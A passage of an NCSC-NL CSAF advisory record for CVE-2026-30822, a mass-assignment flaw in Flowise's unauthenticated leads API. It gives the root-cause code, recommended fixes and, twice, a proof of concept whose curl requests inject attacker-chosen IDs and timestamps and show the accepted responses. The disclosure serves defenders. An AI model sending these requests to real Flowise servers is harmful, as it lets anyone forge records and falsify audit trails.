{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-30822",
        "tracking": {
            "current_release_date": "2026-03-23T04:05:54.615090Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-30822",
            "initial_release_date": "2026-03-06T13:06:50.096068Z",
            "revision_history": [
                {
                    "date": "2026-03-06T13:06:50.096068Z",
                    "number": "1",
                    "summary": "CVE created.| Source connected.| CVE status created. (valid)| Products connected (1).| References created (9)."
                },
                {
                    "date": "2026-03-06T13:06:51.896748Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-06T22:39:33.700231Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T22:39:40.471211Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-07T00:21:05.557063Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)."
                },
                {
                    "date": "2026-03-07T00:21:12.848906Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-07T05:24:43.357466Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-07T05:24:53.124595Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-07T05:38:52.967882Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-07T05:38:57.772121Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-07T14:46:36.973782Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-07T14:46:42.715608Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-09T13:39:52.140898Z",
                    "number": "13",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-09T13:39:55.310780Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-09T18:21:02.333826Z",
                    "number": "15",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-09T18:21:13.202046Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-09T21:38:59.910936Z",
                    "number": "17",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-11T14:25:34.079613Z",
                    "number": "18",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-11T14:25:40.454747Z",
                    "number": "19",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-19T15:29:19.658436Z",
                    "number": "20",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-19T15:29:21.390535Z",
                    "number": "21",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:33:59.051758Z",
                    "number": "22",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:34:03.592106Z",
                    "number": "23",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "23"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<3.0.13",
                                "product": {
                                    "name": "vers:unknown/<3.0.13",
                                    "product_id": "CSAFPID-5768607",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Flowise"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<3.0.13",
                                "product": {
                                    "name": "vers:unknown/>=0|<3.0.13",
                                    "product_id": "CSAFPID-5767907"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "flowise"
                    }
                ],
                "category": "vendor",
                "name": "FlowiseAI"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<3.0.13",
                                "product": {
                                    "name": "vers:unknown/<3.0.13",
                                    "product_id": "CSAFPID-5766734"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Flowise"
                    }
                ],
                "category": "vendor",
                "name": "Open Source"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-30822",
            "cwe": {
                "id": "CWE-915",
                "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\n**A Mass Assignment vulnerability in the `/api/v1/leads` endpoint allows any unauthenticated user to control internal entity fields (`id`, `createdDate`, `chatId`) by including them in the request body.**\n\nThe endpoint uses `Object.assign()` to copy all properties from the request body to the Lead entity without any input validation or field filtering. This allows attackers to bypass auto-generated fields and inject arbitrary values.\n\n| Field | Value |\n|-------|-------|\n| **Vulnerability Type** | Mass Assignment |\n| **CWE ID** | [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html) |\n| **Authentication Required** | None |\n| **Affected Endpoint** | `POST /api/v1/leads` |\n\n\n---\n\n## Details\n\n### Root Cause\n\nThe vulnerability exists in `/packages/server/src/services/leads/index.ts` at lines 27-28:\n\n```typescript\n// File: /packages/server/src/services/leads/index.ts\n// Lines 23-38\n\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        const chatId = body.chatId ?? 
uuidv4()\n\n        const newLead = new Lead()\n        Object.assign(newLead, body)  // ← VULNERABILITY: All properties copied!\n        Object.assign(newLead, { chatId })\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\nThe `Object.assign(newLead, body)` on line 28 copies **ALL** properties from the request body to the Lead entity, including:\n- `id` - The primary key (should be auto-generated)\n- `createdDate` - The creation timestamp (should be auto-generated)\n- `chatId` - The chat identifier\n\n### Lead Entity Definition\n\nThe Lead entity at `/packages/server/src/database/entities/Lead.ts` uses TypeORM decorators that should auto-generate these fields:\n\n```typescript\n// File: /packages/server/src/database/entities/Lead.ts\n\n@Entity()\nexport class Lead implements ILead {\n    @PrimaryGeneratedColumn('uuid')  // Should be auto-generated!\n    id: string\n\n    @Column()\n    name?: string\n\n    @Column()\n    email?: string\n\n    @Column()\n    phone?: string\n\n    @Column()\n    chatflowid: string\n\n    @Column()\n    chatId: string\n\n    @CreateDateColumn()  // Should be auto-generated!\n    createdDate: Date\n}\n```\n\nHowever, `Object.assign()` overwrites these fields before they are saved, bypassing the auto-generation.\n\n### Why the Endpoint is Publicly Accessible\n\nThe `/api/v1/leads` endpoint is whitelisted in `/packages/server/src/utils/constants.ts`:\n\n```typescript\n// File: /packages/server/src/utils/constants.ts\n// Line 20\n\nexport const WHITELIST_URLS = [\n    // ... other endpoints ...\n    '/api/v1/leads',  // ← No authentication required\n    // ... 
more endpoints ...\n]\n```\n\n---\n\n## Proof of Concept\n\n<img width=\"1585\" height=\"817\" alt=\"Screenshot 2025-12-26 at 2 28 00 PM\" src=\"https://github.com/user-attachments/assets/807984e7-ae4f-4e8a-85b7-057d6ac42ff5\" />\n\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- curl installed\n\n### Step 1: Start Flowise\n\nCreate a `docker-compose.yml`:\n\n```yaml\nservices:\n  flowise:\n    image: flowiseai/flowise:latest\n    restart: unless-stopped\n    environment:\n      - PORT=3000\n      - DATABASE_PATH=/root/.flowise\n      - DATABASE_TYPE=sqlite\n      - CORS_ORIGINS=*\n      - DISABLE_FLOWISE_TELEMETRY=true\n    ports:\n      - '3000:3000'\n    volumes:\n      - flowise_data:/root/.flowise\n    entrypoint: /bin/sh -c \"sleep 3; flowise start\"\n\nvolumes:\n  flowise_data:\n```\n\nStart the container:\n\n```bash\ndocker compose up -d\n# Wait for Flowise to be ready (about 1-2 minutes)\ncurl http://localhost:3000/api/v1/ping\n```\n\n### Step 2: Baseline Test - Normal Lead Creation\n\nFirst, create a normal lead to see expected behavior:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"normal-chatflow-123\",\n    \"name\": \"Normal User\",\n    \"email\": \"normal@example.com\",\n    \"phone\": \"555-0000\"\n  }'\n```\n\n**Expected Response (normal behavior):**\n```json\n{\n    \"id\": \"018b23e3-d6cb-4dc5-a276-922a174b44fd\",\n    \"name\": \"Normal User\",\n    \"email\": \"normal@example.com\",\n    \"phone\": \"555-0000\",\n    \"chatflowid\": \"normal-chatflow-123\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"2025-12-26T06:20:39.000Z\"\n}\n```\n\nNote: The `id` and `createdDate` are auto-generated by the server.\n\n### Step 3: Exploit - Inject Custom ID\n\nNow inject a custom `id`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": 
\"attacker-chatflow-456\",\n    \"name\": \"Attacker\",\n    \"email\": \"attacker@evil.com\",\n    \"phone\": \"555-EVIL\",\n    \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n    \"name\": \"Attacker\",\n    \"email\": \"attacker@evil.com\",\n    \"phone\": \"555-EVIL\",\n    \"chatflowid\": \"attacker-chatflow-456\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"2025-12-26T06:20:40.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled `id` was accepted!**\n\n### Step 4: Exploit - Inject Custom Timestamp\n\nInject a fake `createdDate`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"timestamp-test-789\",\n    \"name\": \"Time Traveler\",\n    \"email\": \"timetraveler@evil.com\",\n    \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": \"some-auto-generated-uuid\",\n    \"name\": \"Time Traveler\",\n    \"email\": \"timetraveler@evil.com\",\n    \"chatflowid\": \"timestamp-test-789\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled timestamp from 1970 was accepted!**\n\n### Step 5: Exploit - Combined Mass Assignment\n\nInject multiple fields at once:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"any-chatflow-attacker-wants\",\n    \"name\": \"Mass Assignment Attacker\",\n    \"email\": \"massassign@evil.com\",\n    \"phone\": \"555-HACK\",\n    \"id\": \"11111111-2222-3333-4444-555555555555\",\n    \"createdDate\": \"2000-01-01T12:00:00.000Z\",\n    \"chatId\": \"custom-chat-id-injected\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": 
\"11111111-2222-3333-4444-555555555555\",\n    \"name\": \"Mass Assignment Attacker\",\n    \"email\": \"massassign@evil.com\",\n    \"phone\": \"555-HACK\",\n    \"chatflowid\": \"any-chatflow-attacker-wants\",\n    \"chatId\": \"custom-chat-id-injected\",\n    \"createdDate\": \"2000-01-01T12:00:00.000Z\"\n}\n```\n\n**⚠️ ALL three internal fields (`id`, `createdDate`, `chatId`) were controlled by the attacker!**\n\n### Verification\n\nThe exploit succeeds because:\n1. ✅ HTTP 200 response (request accepted)\n2. ✅ `id` field contains attacker-controlled UUID\n3. ✅ `createdDate` field contains attacker-controlled timestamp\n4. ✅ `chatId` field contains attacker-controlled string\n5. ✅ No authentication headers were sent\n\n---\n\n## Impact\n\n### Who is Affected?\n\n- **All Flowise deployments** that use the leads feature\n- Both **open-source** and **enterprise** versions\n- Any system that relies on lead data integrity\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| **ID Collision Attack** | Attacker creates leads with specific UUIDs, potentially overwriting existing records or causing database conflicts |\n| **Audit Trail Manipulation** | Attacker sets fake `createdDate` values to hide malicious activity or manipulate reporting |\n| **Data Integrity Violation** | Internal fields that should be server-controlled are now user-controlled |\n| **Chatflow Association** | Attacker can link leads to arbitrary chatflows they don't own |\n\n### Severity Assessment\n\nWhile this vulnerability doesn't directly expose sensitive data (unlike the IDOR vulnerability), it violates the principle that internal/auto-generated fields should not be user-controllable. 
This can lead to:\n\n- Data integrity issues\n- Potential business logic bypasses\n- Audit/compliance concerns\n- Foundation for chained attacks\n\n---\n\n## Recommended Fix\n\n### Option 1: Whitelist Allowed Fields (Recommended)\n\nOnly copy explicitly allowed fields from the request body:\n\n```typescript\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        const chatId = body.chatId ?? uuidv4()\n\n        const newLead = new Lead()\n        \n        // ✅ Only copy allowed fields\n        const allowedFields = ['chatflowid', 'name', 'email', 'phone']\n        for (const field of allowedFields) {\n            if (body[field] !== undefined) {\n                newLead[field] = body[field]\n            }\n        }\n        newLead.chatId = chatId\n        // Let TypeORM auto-generate id and createdDate\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\n### Option 2: Use Destructuring with Explicit Fields\n\n```typescript\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        // ✅ Only extract allowed fields\n        const { chatflowid, name, email, phone } = body\n        const chatId = body.chatId ?? 
uuidv4()\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create({\n            chatflowid,\n            name,\n            email,\n            phone,\n            chatId\n            // id and createdDate will be auto-generated\n        })\n        \n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\nNote on Options 1 and 2: both deliberately keep accepting a client-supplied `chatId` (the original code already did `body.chatId ?? uuidv4()`), so they close the `id` and `createdDate` vectors but not the `chatId` one listed in the summary. If `chatId` is meant to be server-controlled, generate it server-side and ignore the request value. Also note that the `Partial<ILead>` parameter type is erased at compile time and provides no runtime filtering; the explicit allow-list (or a request-schema validator that rejects unknown properties) is what actually enforces the restriction.\n\n### Option 3: Use class-transformer with @Exclude()\n\nAdd decorators to the Lead entity to exclude sensitive fields from assignment:\n\n```typescript\nimport { Exclude } from 'class-transformer'\n\n@Entity()\nexport class Lead implements ILead {\n    @PrimaryGeneratedColumn('uuid')\n    @Exclude({ toClassOnly: true })  // ✅ Prevent assignment from request\n    id: string\n\n    // ... other fields ...\n\n    @CreateDateColumn()\n    @Exclude({ toClassOnly: true })  // ✅ Prevent assignment from request\n    createdDate: Date\n}\n```\n\nCaveat: `@Exclude()` is only honoured when the entity is built through class-transformer (e.g. `plainToInstance(Lead, body)`); it has no effect on a plain `Object.assign(newLead, body)`. Option 3 therefore only works if `createLead` is also changed to hydrate the entity via class-transformer instead of `Object.assign()`. On its own it is not a fix; prefer Option 1 or 2.\n\n### Additional Recommendation\n\nConsider applying the same fix to other endpoints that use `Object.assign()` with request bodies, such as:\n- `/packages/server/src/utils/addChatMessageFeedback.ts` (similar pattern)\n\n---\n\n## Resources\n\n- [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n- [OWASP: Mass Assignment Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n- [OWASP API Security Top 10 - API3:2023 Broken Object Property Level Authorization (the 2023 category that covers mass assignment)](https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/)\n- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)\n\n---",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-mq4r-h2gh-qv7x.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\n**A Mass Assignment vulnerability in the `/api/v1/leads` endpoint allows any unauthenticated user to control internal entity fields (`id`, `createdDate`, `chatId`) by including them in the request body.**\n\nThe endpoint uses `Object.assign()` to copy all properties from the request body to the Lead entity without any input validation or field filtering. This allows attackers to bypass auto-generated fields and inject arbitrary values.\n\n| Field | Value |\n|-------|-------|\n| **Vulnerability Type** | Mass Assignment |\n| **CWE ID** | [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html) |\n| **Authentication Required** | None |\n| **Affected Endpoint** | `POST /api/v1/leads` |\n\n\n---\n\n## Details\n\n### Root Cause\n\nThe vulnerability exists in `/packages/server/src/services/leads/index.ts` at lines 27-28:\n\n```typescript\n// File: /packages/server/src/services/leads/index.ts\n// Lines 23-38\n\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        const chatId = body.chatId ?? 
uuidv4()\n\n        const newLead = new Lead()\n        Object.assign(newLead, body)  // ← VULNERABILITY: All properties copied!\n        Object.assign(newLead, { chatId })\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\nThe `Object.assign(newLead, body)` on line 28 copies **ALL** properties from the request body to the Lead entity, including:\n- `id` - The primary key (should be auto-generated)\n- `createdDate` - The creation timestamp (should be auto-generated)\n- `chatId` - The chat identifier\n\n### Lead Entity Definition\n\nThe Lead entity at `/packages/server/src/database/entities/Lead.ts` uses TypeORM decorators that should auto-generate these fields:\n\n```typescript\n// File: /packages/server/src/database/entities/Lead.ts\n\n@Entity()\nexport class Lead implements ILead {\n    @PrimaryGeneratedColumn('uuid')  // Should be auto-generated!\n    id: string\n\n    @Column()\n    name?: string\n\n    @Column()\n    email?: string\n\n    @Column()\n    phone?: string\n\n    @Column()\n    chatflowid: string\n\n    @Column()\n    chatId: string\n\n    @CreateDateColumn()  // Should be auto-generated!\n    createdDate: Date\n}\n```\n\nHowever, `Object.assign()` overwrites these fields before they are saved, bypassing the auto-generation.\n\n### Why the Endpoint is Publicly Accessible\n\nThe `/api/v1/leads` endpoint is whitelisted in `/packages/server/src/utils/constants.ts`:\n\n```typescript\n// File: /packages/server/src/utils/constants.ts\n// Line 20\n\nexport const WHITELIST_URLS = [\n    // ... other endpoints ...\n    '/api/v1/leads',  // ← No authentication required\n    // ... 
more endpoints ...\n]\n```\n\n---\n\n## Proof of Concept\n\n<img width=\"1585\" height=\"817\" alt=\"Screenshot 2025-12-26 at 2 28 00 PM\" src=\"https://github.com/user-attachments/assets/807984e7-ae4f-4e8a-85b7-057d6ac42ff5\" />\n\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- curl installed\n\n### Step 1: Start Flowise\n\nCreate a `docker-compose.yml`:\n\n```yaml\nservices:\n  flowise:\n    image: flowiseai/flowise:latest\n    restart: unless-stopped\n    environment:\n      - PORT=3000\n      - DATABASE_PATH=/root/.flowise\n      - DATABASE_TYPE=sqlite\n      - CORS_ORIGINS=*\n      - DISABLE_FLOWISE_TELEMETRY=true\n    ports:\n      - '3000:3000'\n    volumes:\n      - flowise_data:/root/.flowise\n    entrypoint: /bin/sh -c \"sleep 3; flowise start\"\n\nvolumes:\n  flowise_data:\n```\n\nStart the container:\n\n```bash\ndocker compose up -d\n# Wait for Flowise to be ready (about 1-2 minutes)\ncurl http://localhost:3000/api/v1/ping\n```\n\n### Step 2: Baseline Test - Normal Lead Creation\n\nFirst, create a normal lead to see expected behavior:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"normal-chatflow-123\",\n    \"name\": \"Normal User\",\n    \"email\": \"normal@example.com\",\n    \"phone\": \"555-0000\"\n  }'\n```\n\n**Expected Response (normal behavior):**\n```json\n{\n    \"id\": \"018b23e3-d6cb-4dc5-a276-922a174b44fd\",\n    \"name\": \"Normal User\",\n    \"email\": \"normal@example.com\",\n    \"phone\": \"555-0000\",\n    \"chatflowid\": \"normal-chatflow-123\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"2025-12-26T06:20:39.000Z\"\n}\n```\n\nNote: The `id` and `createdDate` are auto-generated by the server.\n\n### Step 3: Exploit - Inject Custom ID\n\nNow inject a custom `id`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": 
\"attacker-chatflow-456\",\n    \"name\": \"Attacker\",\n    \"email\": \"attacker@evil.com\",\n    \"phone\": \"555-EVIL\",\n    \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n    \"name\": \"Attacker\",\n    \"email\": \"attacker@evil.com\",\n    \"phone\": \"555-EVIL\",\n    \"chatflowid\": \"attacker-chatflow-456\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"2025-12-26T06:20:40.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled `id` was accepted!**\n\n### Step 4: Exploit - Inject Custom Timestamp\n\nInject a fake `createdDate`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"timestamp-test-789\",\n    \"name\": \"Time Traveler\",\n    \"email\": \"timetraveler@evil.com\",\n    \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": \"some-auto-generated-uuid\",\n    \"name\": \"Time Traveler\",\n    \"email\": \"timetraveler@evil.com\",\n    \"chatflowid\": \"timestamp-test-789\",\n    \"chatId\": \"auto-generated-uuid\",\n    \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled timestamp from 1970 was accepted!**\n\n### Step 5: Exploit - Combined Mass Assignment\n\nInject multiple fields at once:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"chatflowid\": \"any-chatflow-attacker-wants\",\n    \"name\": \"Mass Assignment Attacker\",\n    \"email\": \"massassign@evil.com\",\n    \"phone\": \"555-HACK\",\n    \"id\": \"11111111-2222-3333-4444-555555555555\",\n    \"createdDate\": \"2000-01-01T12:00:00.000Z\",\n    \"chatId\": \"custom-chat-id-injected\"\n  }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n    \"id\": 
\"11111111-2222-3333-4444-555555555555\",\n    \"name\": \"Mass Assignment Attacker\",\n    \"email\": \"massassign@evil.com\",\n    \"phone\": \"555-HACK\",\n    \"chatflowid\": \"any-chatflow-attacker-wants\",\n    \"chatId\": \"custom-chat-id-injected\",\n    \"createdDate\": \"2000-01-01T12:00:00.000Z\"\n}\n```\n\n**⚠️ ALL three internal fields (`id`, `createdDate`, `chatId`) were controlled by the attacker!**\n\n### Verification\n\nThe exploit succeeds because:\n1. ✅ HTTP 200 response (request accepted)\n2. ✅ `id` field contains attacker-controlled UUID\n3. ✅ `createdDate` field contains attacker-controlled timestamp\n4. ✅ `chatId` field contains attacker-controlled string\n5. ✅ No authentication headers were sent\n\n---\n\n## Impact\n\n### Who is Affected?\n\n- **All Flowise deployments** that use the leads feature\n- Both **open-source** and **enterprise** versions\n- Any system that relies on lead data integrity\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| **ID Collision Attack** | Attacker creates leads with specific UUIDs, potentially overwriting existing records or causing database conflicts |\n| **Audit Trail Manipulation** | Attacker sets fake `createdDate` values to hide malicious activity or manipulate reporting |\n| **Data Integrity Violation** | Internal fields that should be server-controlled are now user-controlled |\n| **Chatflow Association** | Attacker can link leads to arbitrary chatflows they don't own |\n\n### Severity Assessment\n\nWhile this vulnerability doesn't directly expose sensitive data (unlike the IDOR vulnerability), it violates the principle that internal/auto-generated fields should not be user-controllable. 
This can lead to:\n\n- Data integrity issues\n- Potential business logic bypasses\n- Audit/compliance concerns\n- Foundation for chained attacks\n\n---\n\n## Recommended Fix\n\n### Option 1: Whitelist Allowed Fields (Recommended)\n\nOnly copy explicitly allowed fields from the request body:\n\n```typescript\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        const chatId = body.chatId ?? uuidv4()\n\n        const newLead = new Lead()\n        \n        // ✅ Only copy allowed fields\n        const allowedFields = ['chatflowid', 'name', 'email', 'phone']\n        for (const field of allowedFields) {\n            if (body[field] !== undefined) {\n                newLead[field] = body[field]\n            }\n        }\n        newLead.chatId = chatId\n        // Let TypeORM auto-generate id and createdDate\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\n### Option 2: Use Destructuring with Explicit Fields\n\n```typescript\nconst createLead = async (body: Partial<ILead>) => {\n    try {\n        // ✅ Only extract allowed fields\n        const { chatflowid, name, email, phone } = body\n        const chatId = body.chatId ?? 
uuidv4()\n\n        const appServer = getRunningExpressApp()\n        const lead = appServer.AppDataSource.getRepository(Lead).create({\n            chatflowid,\n            name,\n            email,\n            phone,\n            chatId\n            // id and createdDate will be auto-generated\n        })\n        \n        const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n        return dbResponse\n    } catch (error) {\n        throw new InternalFlowiseError(...)\n    }\n}\n```\n\n### Option 3: Use class-transformer with @Exclude()\n\nAdd decorators to the Lead entity to exclude sensitive fields from assignment (note: class-transformer decorators only take effect when the request body is mapped with its `plainToInstance()`; a plain `Object.assign()` ignores them, so this option must be combined with replacing the `Object.assign()` call):\n\n```typescript\nimport { Exclude } from 'class-transformer'\n\n@Entity()\nexport class Lead implements ILead {\n    @PrimaryGeneratedColumn('uuid')\n    @Exclude({ toClassOnly: true })  // ✅ Prevent assignment from request\n    id: string\n\n    // ... other fields ...\n\n    @CreateDateColumn()\n    @Exclude({ toClassOnly: true })  // ✅ Prevent assignment from request\n    createdDate: Date\n}\n```\n\n### Additional Recommendation\n\nConsider applying the same fix to other endpoints that use `Object.assign()` with request bodies, such as:\n- `/packages/server/src/utils/addChatMessageFeedback.ts` (similar pattern)\n\n---\n\n## Resources\n\n- [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n- [OWASP: Mass Assignment Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n- [OWASP API Security Top 10 - API6:2023 Unrestricted Access to Sensitive Business Flows](https://owasp.org/API-Security/editions/2023/en/0xa6-unrestricted-access-to-sensitive-business-flows/)\n- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)\n\n---",
                    "title": "github - https://github.com/advisories/GHSA-mq4r-h2gh-qv7x"
                },
                {
                    "category": "description",
                    "text": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.",
